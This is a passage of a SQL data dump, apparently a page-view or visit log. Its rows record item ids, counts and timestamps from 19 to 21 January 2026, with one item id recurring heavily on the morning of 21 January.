15:34:27'),(102320,5412,1,'2026-01-19','2026-01-19 15:48:07'),(102321,5406,1,'2026-01-19','2026-01-19 15:52:09'),(102322,2904,1,'2026-01-19','2026-01-19 15:57:16'),(102323,5428,1,'2026-01-19','2026-01-19 16:01:17'),(102324,5409,1,'2026-01-19','2026-01-19 16:05:17'),(102325,68,1,'2026-01-19','2026-01-19 16:07:16'),(102326,3083,1,'2026-01-19','2026-01-19 16:09:41'),(102327,5692,1,'2026-01-19','2026-01-19 16:13:28'),(102328,5561,1,'2026-01-19','2026-01-19 16:14:29'),(102329,5441,1,'2026-01-19','2026-01-19 16:17:33'),(102330,4950,1,'2026-01-19','2026-01-19 16:21:28'),(102331,5567,1,'2026-01-19','2026-01-19 16:29:02'),(102332,5605,1,'2026-01-19','2026-01-19 16:48:17'),(102333,5420,1,'2026-01-19','2026-01-19 17:08:53'),(102334,5502,1,'2026-01-19','2026-01-19 17:14:49'),(102335,4827,1,'2026-01-19','2026-01-19 17:22:38'),(102336,3752,1,'2026-01-19','2026-01-19 17:32:28'),(102337,3781,1,'2026-01-19','2026-01-19 17:33:12'),(102338,3069,1,'2026-01-19','2026-01-19 17:35:21'),(102339,5397,1,'2026-01-19','2026-01-19 17:36:17'),(102340,4520,1,'2026-01-19','2026-01-19 17:37:53'),(102341,5492,1,'2026-01-19','2026-01-19 17:40:16'),(102342,3752,1,'2026-01-19','2026-01-19 17:41:26'),(102343,5454,1,'2026-01-19','2026-01-19 17:43:06'),(102344,4660,1,'2026-01-19','2026-01-19 17:54:29'),(102345,5570,1,'2026-01-19','2026-01-19 17:57:29'),(102346,5454,1,'2026-01-19','2026-01-19 18:01:31'),(102347,5425,1,'2026-01-19','2026-01-19 18:09:59'),(102348,4722,1,'2026-01-19','2026-01-19 18:25:10'),(102349,3117,1,'2026-01-19','2026-01-19 18:32:15'),(102350,3038,1,'2026-01-19','2026-01-19 18:38:19'),(102351,5409,1,'2026-01-19','2026-01-19 18:38:20'),(102352,5441,1,'2026-01-19','2026-01-19 18:39:20'),(102353,5461,1,'2026-01-19','2026-01-19 18:50:03'),(102354,72,1,'2026-01-19','2026-01-19 19:04:34'),(102355,5420,1,'2026-01-19','2026-01-19 19:06:32'),(102356,5700,1,'2026-01-19','2026-01-19 19:11:57'),(102357,5700,1,'2026-01-19','2026-01-19 19:18:58'),(102358,4983,1,'2026-01-19','2026-01-19 19:41:16'),(102359,3486,1,'2026-01-19','2026-01-19 19:47:20'),(102360,5461,1,'2026-01-19','2026-01-19 19:47:21'),(102361,110,1,'2026-01-19','2026-01-19 20:36:07'),(102362,4681,1,'2026-01-19','2026-01-19 20:37:06'),(102363,4971,1,'2026-01-19','2026-01-19 20:47:04'),(102364,5449,1,'2026-01-19','2026-01-19 20:49:26'),(102365,1586,1,'2026-01-19','2026-01-19 20:55:16'),(102366,5649,1,'2026-01-19','2026-01-19 21:18:27'),(102367,5489,1,'2026-01-19','2026-01-19 21:44:30'),(102368,3585,1,'2026-01-19','2026-01-19 21:48:36'),(102369,5692,1,'2026-01-19','2026-01-19 22:02:37'),(102370,5522,1,'2026-01-19','2026-01-19 22:18:23'),(102371,5703,1,'2026-01-19','2026-01-19 23:09:41'),(102372,3055,1,'2026-01-19','2026-01-19 23:24:01'),(102373,3175,1,'2026-01-19','2026-01-19 23:27:17'),(102374,5561,1,'2026-01-20','2026-01-20 00:20:22'),(102375,5467,1,'2026-01-20','2026-01-20 03:28:53'),(102376,5683,1,'2026-01-20','2026-01-20 03:29:28'),(102377,3109,1,'2026-01-20','2026-01-20 03:29:30'),(102378,5467,1,'2026-01-20','2026-01-20 04:01:46'),(102379,74,1,'2026-01-20','2026-01-20 04:19:02'),(102380,4722,1,'2026-01-20','2026-01-20 04:24:56'),(102381,4960,1,'2026-01-20','2026-01-20 05:27:31'),(102382,4608,1,'2026-01-20','2026-01-20 05:30:33'),(102383,479,1,'2026-01-20','2026-01-20 05:32:37'),(102384,5062,1,'2026-01-20','2026-01-20 06:46:59'),(102385,2813,1,'2026-01-20','2026-01-20 07:11:59'),(102386,2395,1,'2026-01-20','2026-01-20 07:33:04'),(102387,91,1,'2026-01-20','2026-01-20 08:33:43'),(102388,5700,1,'2026-01-20','2026-01-20 09:09:34'),(102389,5703,1,'2026-01-20','2026-01-20 09:10:04'),(102390,5700,1,'2026-01-20','2026-01-20 09:18:01'),(102391,3781,1,'2026-01-20','2026-01-20 09:33:40'),(102392,5567,1,'2026-01-20','2026-01-20 10:14:40'),(102393,5397,1,'2026-01-20','2026-01-20 10:31:31'),(102394,1582,1,'2026-01-20','2026-01-20 10:37:22'),(102395,5457,1,'2026-01-20','2026-01-20 10:52:23'),(102396,1734,1,'2026-01-20','2026-01-20 11:13:07'),(102397,4400,1,'2026-01-20','2026-01-20 11:21:30'),(102398,5406,1,'2026-01-20','2026-01-20 11:23:48'),(102399,2297,1,'2026-01-20','2026-01-20 11:28:31'),(102400,2297,1,'2026-01-20','2026-01-20 11:29:03'),(102401,4911,1,'2026-01-20','2026-01-20 11:43:41'),(102402,1715,1,'2026-01-20','2026-01-20 11:57:30'),(102403,5700,1,'2026-01-20','2026-01-20 11:58:32'),(102404,5708,1,'2026-01-20','2026-01-20 11:58:52'),(102405,5708,1,'2026-01-20','2026-01-20 12:10:35'),(102406,3714,1,'2026-01-20','2026-01-20 12:10:40'),(102407,5708,1,'2026-01-20','2026-01-20 12:16:57'),(102408,3790,1,'2026-01-20','2026-01-20 12:22:33'),(102409,5708,1,'2026-01-20','2026-01-20 12:27:10'),(102410,4457,1,'2026-01-20','2026-01-20 12:27:17'),(102411,5708,1,'2026-01-20','2026-01-20 12:27:40'),(102412,5708,1,'2026-01-20','2026-01-20 12:39:19'),(102413,5080,1,'2026-01-20','2026-01-20 12:49:46'),(102414,2148,1,'2026-01-20','2026-01-20 13:28:39'),(102415,4930,1,'2026-01-20','2026-01-20 14:13:53'),(102416,474,1,'2026-01-20','2026-01-20 14:28:09'),(102417,3004,1,'2026-01-20','2026-01-20 14:32:22'),(102418,5708,1,'2026-01-20','2026-01-20 14:46:02'),(102419,2148,1,'2026-01-20','2026-01-20 14:56:32'),(102420,5708,1,'2026-01-20','2026-01-20 15:31:34'),(102421,4862,1,'2026-01-20','2026-01-20 16:41:51'),(102422,5522,1,'2026-01-20','2026-01-20 17:06:49'),(102423,5708,1,'2026-01-20','2026-01-20 17:42:50'),(102424,470,1,'2026-01-20','2026-01-20 18:10:48'),(102425,470,1,'2026-01-20','2026-01-20 18:11:06'),(102426,4802,1,'2026-01-20','2026-01-20 18:15:09'),(102427,74,1,'2026-01-20','2026-01-20 18:34:39'),(102428,84,1,'2026-01-20','2026-01-20 18:34:50'),(102429,74,1,'2026-01-20','2026-01-20 18:34:59'),(102430,68,1,'2026-01-20','2026-01-20 18:35:01'),(102431,76,1,'2026-01-20','2026-01-20 18:35:06'),(102432,76,1,'2026-01-20','2026-01-20 18:35:13'),(102433,5708,1,'2026-01-20','2026-01-20 18:35:39'),(102434,4944,1,'2026-01-20','2026-01-20 18:41:18'),(102435,74,1,'2026-01-20','2026-01-20 19:03:59'),(102436,3271,1,'2026-01-20','2026-01-20 19:43:11'),(102437,5409,1,'2026-01-20','2026-01-20 20:32:59'),(102438,5567,1,'2026-01-20','2026-01-20 20:41:24'),(102439,3307,1,'2026-01-20','2026-01-20 20:41:33'),(102440,1606,1,'2026-01-20','2026-01-20 21:00:21'),(102441,4966,1,'2026-01-20','2026-01-20 21:11:56'),(102442,1588,1,'2026-01-20','2026-01-20 21:34:44'),(102443,4520,1,'2026-01-20','2026-01-20 21:34:46'),(102444,2971,1,'2026-01-20','2026-01-20 22:23:52'),(102445,1732,1,'2026-01-20','2026-01-20 22:37:27'),(102446,1608,1,'2026-01-20','2026-01-20 23:08:59'),(102447,87,1,'2026-01-20','2026-01-20 23:10:10'),(102448,91,1,'2026-01-20','2026-01-20 23:11:27'),(102449,1608,1,'2026-01-20','2026-01-20 23:12:55'),(102450,4944,1,'2026-01-21','2026-01-21 00:01:51'),(102451,5042,1,'2026-01-21','2026-01-21 00:08:31'),(102452,4944,1,'2026-01-21','2026-01-21 00:12:24'),(102453,5708,1,'2026-01-21','2026-01-21 00:14:13'),(102454,5682,1,'2026-01-21','2026-01-21 00:30:14'),(102455,4950,1,'2026-01-21','2026-01-21 00:51:41'),(102456,4950,1,'2026-01-21','2026-01-21 01:51:58'),(102457,1612,1,'2026-01-21','2026-01-21 02:58:53'),(102458,5708,1,'2026-01-21','2026-01-21 03:13:27'),(102459,1604,1,'2026-01-21','2026-01-21 03:33:20'),(102460,4400,1,'2026-01-21','2026-01-21 03:37:46'),(102461,4883,1,'2026-01-21','2026-01-21 03:40:47'),(102462,5420,1,'2026-01-21','2026-01-21 04:42:49'),(102463,3727,1,'2026-01-21','2026-01-21 04:55:45'),(102464,1602,1,'2026-01-21','2026-01-21 04:59:35'),(102465,1780,1,'2026-01-21','2026-01-21 05:11:08'),(102466,4950,1,'2026-01-21','2026-01-21 05:25:18'),(102467,5708,1,'2026-01-21','2026-01-21 05:47:01'),(102468,5515,1,'2026-01-21','2026-01-21 07:03:19'),(102469,1604,1,'2026-01-21','2026-01-21 07:19:48'),(102470,5507,1,'2026-01-21','2026-01-21 08:25:07'),(102471,91,1,'2026-01-21','2026-01-21 08:50:50'),(102472,5712,1,'2026-01-21','2026-01-21 09:19:17'),(102473,5712,1,'2026-01-21','2026-01-21 09:19:26'),(102474,5712,1,'2026-01-21','2026-01-21 09:19:34'),(102475,5712,1,'2026-01-21','2026-01-21 09:19:43'),(102476,5712,1,'2026-01-21','2026-01-21 09:20:35'),(102477,5712,1,'2026-01-21','2026-01-21 09:20:55'),(102478,5712,1,'2026-01-21','2026-01-21 09:21:08'),(102479,5712,1,'2026-01-21','2026-01-21 09:21:19'),(102480,5712,1,'2026-01-21','2026-01-21 09:21:45'),(102481,5712,1,'2026-01-21','2026-01-21 09:21:50'),(102482,5712,1,'2026-01-21','2026-01-21 09:24:29'),(102483,5712,1,'2026-01-21','2026-01-21 09:25:14'),(102484,5712,1,'2026-01-21','2026-01-21 09:26:14'),(102485,5712,1,'2026-01-21','2026-01-21 09:26:19'),(102486,5712,1,'2026-01-21','2026-01-21 09:26:55'),(102487,5712,1,'2026-01-21','2026-01-21 09:27:49'),(102488,5712,1,'2026-01-21','2026-01-21 09:29:17'),(102489,5712,1,'2026-01-21','2026-01-21 09:30:01'),(102490,5712,1,'2026-01-21','2026-01-21 09:30:51'),(102491,5712,1,'2026-01-21','2026-01-21 09:33:37'),(102492,5712,1,'2026-01-21','2026-01-21 09:36:01'),(102493,5712,1,'2026-01-21','2026-01-21 09:40:07'),(102494,5712,1,'2026-01-21','2026-01-21 09:40:15'),(102495,5712,1,'2026-01-21','2026-01-21 09:42:10'),(102496,5712,1,'2026-01-21','2026-01-21 09:43:24'),(102497,5712,1,'2026-01-21','2026-01-21 09:44:01'),(102498,5712,1,'2026-01-21','2026-01-21 09:44:38'),(102499,5712,1,'2026-01-21','2026-01-21 09:45:15'),(102500,5712,1,'2026-01-21','2026-01-21 09:45:43'),(102501,2904,1,'2026-01-21','2026-01-21 09:47:20'),(102502,5712,1,'2026-01-21','2026-01-21 09:48:49'),(102503,5712,1,'2026-01-21','2026-01-21 09:48:53'),(102504,5712,1,'2026-01-21','2026-01-21 09:49:28'),(102505,5712,1,'2026-01-21','2026-01-21 09:52:56'),(102506,5712,1,'2026-01-21','2026-01-21 09:57:19'),(102507,5712,1,'2026-01-21','2026-01-21 09:58:01'),(102508,5712,1,'2026-01-21','2026-01-21 09:58:45'),(102509,5712,1,'2026-01-21','2026-01-21 10:01:00'),(102510,5712,1,'2026-01-21','2026-01-21 10:01:05'),(102511,5712,1,'2026-01-21','2026-01-21 10:01:12'),(102512,5712,1,'2026-01-21','2026-01-21 10:01:42'),(102513,5712,1,'2026-01-21','2026-01-21 10:01:53'),(102514,5712,1,'2026-01-21','2026-01-21 10:02:04'),(102515,5712,1,'2026-01-21','2026-01-21 10:02:06'),(102516,5712,1,'2026-01-21','2026-01-21 10:02:36'),(102517,4983,1,'2026-01-21','2026-01-21 10:02:38'),(102518,5712,1,'2026-01-21','2026-01-21 10:02:41'),(102519,5712,1,'2026-01-21','2026-01-21 10:03:13'),(102520,5712,1,'2026-01-21','2026-01-21 10:03:14'),(102521,5712,1,'2026-01-21','2026-01-21 10:03:24'),(102522,5712,1,'2026-01-21','2026-01-21 10:04:45'),(102523,5712,1,'2026-01-21','2026-01-21 10:04:52'),(102524,5712,1,'2026-01-21','2026-01-21 10:05:14'),(102525,5712,1,'2026-01-21','2026-01-21 10:06:00'),(102526,5712,1,'2026-01-21','2026-01-21 10:07:00'),(102527,5712,1,'2026-01-21','2026-01-21 10:07:02'),(102528,5712,1,'2026-01-21','2026-01-21 10:07:08'),(102529,5712,1,'2026-01-21','2026-01-21 10:07:13'),(102530,5712,1,'2026-01-21','2026-01-21 10:07:56'),(102531,5712,1,'2026-01-21','2026-01-21 10:08:06'),(102532,5712,1,'2026-01-21','2026-01-21 10:08:42'),(102533,5712,1,'2026-01-21','2026-01-21 10:08:49'),(102534,5712,1,'2026-01-21','2026-01-21 10:08:51'),(102535,5712,1,'2026-01-21','2026-01-21 10:09:12'),(102536,5712,1,'2026-01-21','2026-01-21 10:09:37'),(102537,5712,1,'2026-01-21','2026-01-21 10:09:38'),(102538,5712,1,'2026-01-21','2026-01-21 10:09:57'),(102539,5712,1,'2026-01-21','2026-01-21 10:10:10'),(102540,5712,1,'2026-01-21','2026-01-21 10:10:27'),(102541,5712,1,'2026-01-21','2026-01-21 10:11:08'),(102542,5712,1,'2026-01-21','2026-01-21 10:11:33'),(102543,5712,1,'2026-01-21','2026-01-21 10:11:34'),(102544,5712,1,'2026-01-21','2026-01-21 10:11:41'),(102545,5712,1,'2026-01-21','2026-01-21 10:11:46'),(102546,5712,1,'2026-01-21','2026-01-21 10:11:50'),(102547,5712,1,'2026-01-21','2026-01-21 10:12:01'),(102548,5712,1,'2026-01-21','2026-01-21 10:12:13'),(102549,5712,1,'2026-01-21','2026-01-21 10:12:17'),(102550,5712,1,'2026-01-21','2026-01-21 10:12:17'),(102551,5712,1,'2026-01-21','2026-01-21 10:12:51'),(102552,5712,1,'2026-01-21','2026-01-21 10:13:04'),(102553,5712,1,'2026-01-21','2026-01-21 10:13:07'),(102554,5712,1,'2026-01-21','2026-01-21 10:13:09'),(102555,5712,1,'2026-01-21','2026-01-21 10:13:29'),(102556,5712,1,'2026-01-21','2026-01-21 10:13:52'),(102557,5712,1,'2026-01-21','2026-01-21 10:13:55'),(102558,5712,1,'2026-01-21','2026-01-21 10:14:04'),(102559,76,1,'2026-01-21','2026-01-21 10:14:41'),(102560,5712,1,'2026-01-21','2026-01-21 10:14:47'),(102561,5712,1,'2026-01-21','2026-01-21 10:14:51'),(102562,5712,1,'2026-01-21','2026-01-21 10:15:05'),(102563,5712,1,'2026-01-21','2026-01-21 10:15:37'),(102564,5712,1,'2026-01-21','2026-01-21 10:16:06'),(102565,5712,1,'2026-01-21','2026-01-21 10:16:21'),(102566,5712,1,'2026-01-21','2026-01-21 10:16:31'),(102567,5712,1,'2026-01-21','2026-01-21 10:16:48'),(102568,5712,1,'2026-01-21','2026-01-21 10:17:22'),(102569,5712,1,'2026-01-21','2026-01-21 10:18:01'),(102570,5712,1,'2026-01-21','2026-01-21 10:18:30'),(102571,5712,1,'2026-01-21','2026-01-21 10:18:41'),(102572,5712,1,'2026-01-21','2026-01-21 10:18:43'),(102573,5712,1,'2026-01-21','2026-01-21 10:19:01'),(102574,5712,1,'2026-01-21','2026-01-21 10:19:05'),(102575,5712,1,'2026-01-21','2026-01-21 10:19:18'),(102576,5712,1,'2026-01-21','2026-01-21 10:19:43'),(102577,5712,1,'2026-01-21','2026-01-21 10:20:17'),(102578,5712,1,'2026-01-21','2026-01-21 10:20:52'),(102579,5712,1,'2026-01-21','2026-01-21 10:22:29'),(102580,5712,1,'2026-01-21','2026-01-21 10:22:30'),(102581,5712,1,'2026-01-21','2026-01-21 10:22:39'),(102582,5712,1,'2026-01-21','2026-01-21 10:22:51'),(102583,5712,1,'2026-01-21','2026-01-21 10:23:00'),(102584,2904,1,'2026-01-21','2026-01-21 10:23:04'),(102585,5712,1,'2026-01-21','2026-01-21 10:23:05'),(102586,5712,1,'2026-01-21','2026-01-21 10:23:13'),(102587,5712,1,'2026-01-21','2026-01-21 10:23:26'),(102588,5712,1,'2026-01-21','2026-01-21 10:23:33'),(102589,5712,1,'2026-01-21','2026-01-21 10:23:37'),(102590,5712,1,'2026-01-21','2026-01-21 10:24:23'),(102591,5712,1,'2026-01-21','2026-01-21 10:24:34'),(102592,5712,1,'2026-01-21','2026-01-21 10:24:59'),(102593,5712,1,'2026-01-21','2026-01-21 10:25:07'),(102594,5712,1,'2026-01-21','2026-01-21 10:25:34'),(102595,5712,1,'2026-01-21','2026-01-21 10:27:29'),(102596,5712,1,'2026-01-21','2026-01-21 10:27:41'),(102597,5712,1,'2026-01-21','2026-01-21 10:28:18'),(102598,5712,1,'2026-01-21','2026-01-21 10:28:24'),(102599,2904,1,'2026-01-21','2026-01-21 10:29:29'),(102600,5712,1,'2026-01-21','2026-01-21 10:29:34'),(102601,5712,1,'2026-01-21','2026-01-21 10:29:50'),(102602,2904,1,'2026-01-21','2026-01-21 10:30:34'),(102603,2904,1,'2026-01-21','2026-01-21 10:30:54'),(102604,5712,1,'2026-01-21','2026-01-21 10:31:21'),(102605,2904,1,'2026-01-21','2026-01-21 10:31:26'),(102606,5712,1,'2026-01-21','2026-01-21 10:31:29'),(102607,5712,1,'2026-01-21','2026-01-21 10:31:34'),(102608,5712,1,'2026-01-21','2026-01-21 10:31:53'),(102609,5712,1,'2026-01-21','2026-01-21 10:32:02'),(102610,5712,1,'2026-01-21','2026-01-21 10:32:10'),(102611,5712,1,'2026-01-21','2026-01-21 10:32:37'),(102612,5712,1,'2026-01-21','2026-01-21 10:32:44'),(102613,2904,1,'2026-01-21','2026-01-21 10:33:02'),(102614,5712,1,'2026-01-21','2026-01-21 10:33:16'),(102615,5712,1,'2026-01-21','2026-01-21 10:33:50'),(102616,2904,1,'2026-01-21','2026-01-21 10:34:02'),(102617,5712,1,'2026-01-21','2026-01-21 10:34:45'),(102618,5712,1,'2026-01-21','2026-01-21 10:35:50'),(102619,5712,1,'2026-01-21','2026-01-21 10:35:55'),(102620,5712,1,'2026-01-21','2026-01-21 10:36:10'),(102621,5712,1,'2026-01-21','2026-01-21 10:36:49'),(102622,5712,1,'2026-01-21','2026-01-21 10:37:24'),(102623,5712,1,'2026-01-21','2026-01-21 10:37:30'),(102624,5712,1,'2026-01-21','2026-01-21 10:37:31'),(102625,5712,1,'2026-01-21','2026-01-21 10:37:53'),(102626,5712,1,'2026-01-21','2026-01-21 10:38:14'),(102627,5712,1,'2026-01-21','2026-01-21 10:38:26'),(102628,5712,1,'2026-01-21','2026-01-21 10:38:35'),(102629,5712,1,'2026-01-21','2026-01-21 10:38:38'),(102630,1582,1,'2026-01-21','2026-01-21 10:39:09'),(102631,5712,1,'2026-01-21','2026-01-21 10:39:44'),(102632,5712,1,'2026-01-21','2026-01-21 10:39:45'),(102633,5712,1,'2026-01-21','2026-01-21 10:40:04'),(102634,68,1,'2026-01-21','2026-01-21 10:40:04'),(102635,5712,1,'2026-01-21','2026-01-21 10:40:21'),(102636,5712,1,'2026-01-21','2026-01-21 10:40:45'),(102637,5712,1,'2026-01-21','2026-01-21 10:40:54'),(102638,84,1,'2026-01-21','2026-01-21 10:41:00'),(102639,5712,1,'2026-01-21','2026-01-21 10:41:03'),(102640,2904,1,'2026-01-21','2026-01-21 10:41:04'),(102641,5712,1,'2026-01-21','2026-01-21 10:41:16'),(102642,5712,1,'2026-01-21','2026-01-21 10:41:24'),(102643,5712,1,'2026-01-21','2026-01-21 10:41:26'),(102644,5712,1,'2026-01-21','2026-01-21 10:41:28'),(102645,87,1,'2026-01-21','2026-01-21 10:41:31'),(102646,5712,1,'2026-01-21','2026-01-21 10:41:56'),(102647,5712,1,'2026-01-21','2026-01-21 10:41:59'),(102648,5712,1,'2026-01-21','2026-01-21 10:42:32'),(102649,2904,1,'2026-01-21','2026-01-21 10:42:37'),(102650,5712,1,'2026-01-21','2026-01-21 10:42:41'),(102651,5712,1,'2026-01-21','2026-01-21 10:42:42'),(102652,5712,1,'2026-01-21','2026-01-21 10:42:44'),(102653,5712,1,'2026-01-21','2026-01-21 10:43:05'),(102654,5712,1,'2026-01-21','2026-01-21 10:43:06'),(102655,5712,1,'2026-01-21','2026-01-21 10:43:41'),(102656,5712,1,'2026-01-21','2026-01-21 10:44:10'),(102657,5712,1,'2026-01-21','2026-01-21 10:44:12'),(102658,5712,1,'2026-01-21','2026-01-21 10:44:14'),(102659,5712,1,'2026-01-21','2026-01-21 10:44:47'),(102660,5712,1,'2026-01-21','2026-01-21 10:45:45'),(102661,5712,1,'2026-01-21','2026-01-21 10:45:54'),(102662,5712,1,'2026-01-21','2026-01-21 10:46:10'),(102663,5712,1,'2026-01-21','2026-01-21 10:46:13'),(102664,5712,1,'2026-01-21','2026-01-21 10:46:54'),(102665,5712,1,'2026-01-21','2026-01-21 10:46:56'),(102666,5712,1,'2026-01-21','2026-01-21 10:47:13'),(102667,2904,1,'2026-01-21','2026-01-21 10:48:05'),(102668,2904,1,'2026-01-21','2026-01-21 10:48:07'),(102669,5712,1,'2026-01-21','2026-01-21 10:48:08'),(102670,5712,1,'2026-01-21','2026-01-21 10:48:25'),(102671,5712,1,'2026-01-21','2026-01-21 10:48:26'),(102672,5712,1,'2026-01-21','2026-01-21 10:48:59'),(102673,5712,1,'2026-01-21','2026-01-21 10:49:24'),(102674,5712,1,'2026-01-21','2026-01-21 10:49:45'),(102675,5712,1,'2026-01-21','2026-01-21 10:52:19'),(102676,5712,1,'2026-01-21','2026-01-21 10:53:01'),(102677,5712,1,'2026-01-21','2026-01-21 10:53:29'),(102678,5712,1,'2026-01-21','2026-01-21 10:53:34'),(102679,5712,1,'2026-01-21','2026-01-21 10:53:57'),(102680,5712,1,'2026-01-21','2026-01-21 10:54:10'),(102681,5712,1,'2026-01-21','2026-01-21 10:54:30'),(102682,5712,1,'2026-01-21','2026-01-21 10:55:01'),(102683,5712,1,'2026-01-21','2026-01-21 10:55:24'),(102684,5712,1,'2026-01-21','2026-01-21 10:56:06'),(102685,5712,1,'2026-01-21','2026-01-21 10:56:21'),(102686,5712,1,'2026-01-21','2026-01-21 10:56:41'),(102687,5712,1,'2026-01-21','2026-01-21 10:57:00'),(102688,5712,1,'2026-01-21','2026-01-21 10:57:53'),(102689,5712,1,'2026-01-21','2026-01-21 10:58:57'),(102690,5712,1,'2026-01-21','2026-01-21 10:59:21'),(102691,5712,1,'2026-01-21','2026-01-21 10:59:26'),(102692,5712,1,'2026-01-21','2026-01-21 10:59:31'),(102693,5712,1,'2026-01-21','2026-01-21 10:59:34'),(102694,5712,1,'2026-01-21','2026-01-21 11:00:00'),(102695,5712,1,'2026-01-21','2026-01-21 11:00:01'),(102696,5712,1,'2026-01-21','2026-01-21 11:00:15'),(102697,5712,1,'2026-01-21','2026-01-21 11:00:44'),(102698,5712,1,'2026-01-21','2026-01-21 11:00:45'),(102699,5712,1,'2026-01-21','2026-01-21 11:00:52'),(102700,5712,1,'2026-01-21','2026-01-21 11:00:52'),(102701,5712,1,'2026-01-21','2026-01-21 11:01:19'),(102702,2904,1,'2026-01-21','2026-01-21 11:01:43'),(102703,5712,1,'2026-01-21','2026-01-21 11:02:26'),(102704,5712,1,'2026-01-21','2026-01-21 11:02:28'),(102705,2904,1,'2026-01-21','2026-01-21 11:02:29'),(102706,2904,1,'2026-01-21','2026-01-21 11:02:43'),(102707,5712,1,'2026-01-21','2026-01-21 11:02:51'),(102708,2904,1,'2026-01-21','2026-01-21 11:02:57'),(102709,5712,1,'2026-01-21','2026-01-21 11:03:57'),(102710,5712,1,'2026-01-21','2026-01-21 11:04:56'),(102711,5712,1,'2026-01-21','2026-01-21 11:04:56'),(102712,5712,1,'2026-01-21','2026-01-21 11:04:57'),(102713,5712,1,'2026-01-21','2026-01-21 11:05:07'),(102714,5712,1,'2026-01-21','2026-01-21 11:05:28'),(102715,5712,1,'2026-01-21','2026-01-21 11:05:41'),(102716,2904,1,'2026-01-21','2026-01-21 11:05:55'),(102717,5712,1,'2026-01-21','2026-01-21 11:06:19'),(102718,5712,1,'2026-01-21','2026-01-21 11:06:29'),(102719,5712,1,'2026-01-21','2026-01-21 11:07:09'),(102720,5712,1,'2026-01-21','2026-01-21 11:07:13'),(102721,5712,1,'2026-01-21','2026-01-21 11:07:55'),(102722,5712,1,'2026-01-21','2026-01-21 11:08:10'),(102723,5712,1,'2026-01-21','2026-01-21 11:08:18'),(102724,5712,1,'2026-01-21','2026-01-21 11:08:55'),(102725,5712,1,'2026-01-21','2026-01-21 11:09:13'),(102726,5712,1,'2026-01-21','2026-01-21 11:09:20'),(102727,5712,1,'2026-01-21','2026-01-21 11:09:30'),(102728,5712,1,'2026-01-21','2026-01-21 11:09:32'),(102729,5712,1,'2026-01-21','2026-01-21 11:09:56'),(102730,5712,1,'2026-01-21','2026-01-21 11:10:00'),(102731,5712,1,'2026-01-21','2026-01-21 11:10:05'),(102732,5712,1,'2026-01-21','2026-01-21 11:10:55'),(102733,5712,1,'2026-01-21','2026-01-21 11:11:10'),(102734,5712,1,'2026-01-21','2026-01-21 11:11:52'),(102735,5712,1,'2026-01-21','2026-01-21 11:11:54'),(102736,5712,1,'2026-01-21','2026-01-21 11:12:14'),(102737,5712,1,'2026-01-21','2026-01-21 11:12:51'),(102738,5712,1,'2026-01-21','2026-01-21 11:13:07'),(102739,5712,1,'2026-01-21','2026-01-21 11:13:08'),(102740,5712,1,'2026-01-21','2026-01-21 11:13:15'),(102741,5712,1,'2026-01-21','2026-01-21 11:13:17'),(102742,5712,1,'2026-01-21','2026-01-21 11:14:47'),(102743,2503,1,'2026-01-21','2026-01-21 11:15:48'),(102744,5712,1,'2026-01-21','2026-01-21 11:16:46'),(102745,5712,1,'2026-01-21','2026-01-21 11:17:32'),(102746,5712,1,'2026-01-21','2026-01-21 11:18:59'),(102747,5712,1,'2026-01-21','2026-01-21 11:19:03'),(102748,5712,1,'2026-01-21','2026-01-21 11:19:37'),(102749,4944,1,'2026-01-21','2026-01-21 11:20:02'),(102750,468,1,'2026-01-21','2026-01-21 11:20:11'),(102751,5712,1,'2026-01-21','2026-01-21 11:20:12'),(102752,5712,1,'2026-01-21','2026-01-21 11:20:35'),(102753,5712,1,'2026-01-21','2026-01-21 11:21:10'),(102754,5712,1,'2026-01-21','2026-01-21 11:21:55'),(102755,5712,1,'2026-01-21','2026-01-21 11:22:03'),(102756,5712,1,'2026-01-21','2026-01-21 11:23:19'),(102757,5712,1,'2026-01-21','2026-01-21 11:23:19'),(102758,5712,1,'2026-01-21','2026-01-21 11:24:12'),(102759,5712,1,'2026-01-21','2026-01-21 11:25:24'),(102760,5712,1,'2026-01-21','2026-01-21 11:26:23'),(102761,5712,1,'2026-01-21','2026-01-21 11:27:09'),(102762,5712,1,'2026-01-21','2026-01-21 11:27:29'),(102763,5712,1,'2026-01-21','2026-01-21 11:28:31'),(102764,5712,1,'2026-01-21','2026-01-21 11:29:23'),(102765,5631,1,'2026-01-21','2026-01-21 11:29:30'),(102766,5712,1,'2026-01-21','2026-01-21 11:29:45'),(102767,5712,1,'2026-01-21','2026-01-21 11:30:04'),(102768,5712,1,'2026-01-21','2026-01-21 11:30:08'),(102769,5712,1,'2026-01-21','2026-01-21 11:30:16'),(102770,5712,1,'2026-01-21','2026-01-21 11:30:35'),(102771,5712,1,'2026-01-21','2026-01-21 11:30:38'),(102772,5712,1,'2026-01-21','2026-01-21 11:30:57'),(102773,5712,1,'2026-01-21','2026-01-21 11:31:38'),(102774,5712,1,'2026-01-21','2026-01-21 11:31:51'),(102775,5712,1,'2026-01-21','2026-01-21 11:32:09'),(102776,5712,1,'2026-01-21','2026-01-21 11:32:29'),(102777,5712,1,'2026-01-21','2026-01-21 11:32:31'),(102778,5712,1,'2026-01-21','2026-01-21 11:33:24'),(102779,5712,1,'2026-01-21','2026-01-21 11:33:42'),(102780,5712,1,'2026-01-21','2026-01-21 11:33:59'),(102781,5712,1,'2026-01-21','2026-01-21 11:34:11'),(102782,5712,1,'2026-01-21','2026-01-21 11:34:37'),(102783,5712,1,'2026-01-21','2026-01-21 11:34:59'),(102784,5712,1,'2026-01-21','2026-01-21 11:35:36'),(102785,5712,1,'2026-01-21','2026-01-21 11:36:13'),(102786,5712,1,'2026-01-21','2026-01-21 11:36:21'),(102787,5712,1,'2026-01-21','2026-01-21 11:37:17'),(102788,5712,1,'2026-01-21','2026-01-21 11:37:28'),(102789,5712,1,'2026-01-21','2026-01-21 11:38:22'),(102790,5712,1,'2026-01-21','2026-01-21 11:38:25'),(102791,5712,1,'2026-01-21','2026-01-21 11:39:17'),(102792,5712,1,'2026-01-21','2026-01-21 11:39:34'),(102793,5712,1,'2026-01-21','2026-01-21 11:39:43'),(102794,5712,1,'2026-01-21','2026-01-21 11:41:56'),(102795,5712,1,'2026-01-21','2026-01-21 11:42:17'),(102796,5712,1,'2026-01-21','2026-01-21 11:42:32'),(102797,2904,1,'2026-01-21','2026-01-21 11:42:40'),(102798,2904,1,'2026-01-21','2026-01-21 11:42:44'),(102799,2904,1,'2026-01-21','2026-01-21 11:43:22'),(102800,5712,1,'2026-01-21','2026-01-21 11:43:28'),(102801,5712,1,'2026-01-21','2026-01-21 11:44:16'),(102802,5712,1,'2026-01-21','2026-01-21 11:44:24'),(102803,2904,1,'2026-01-21','2026-01-21 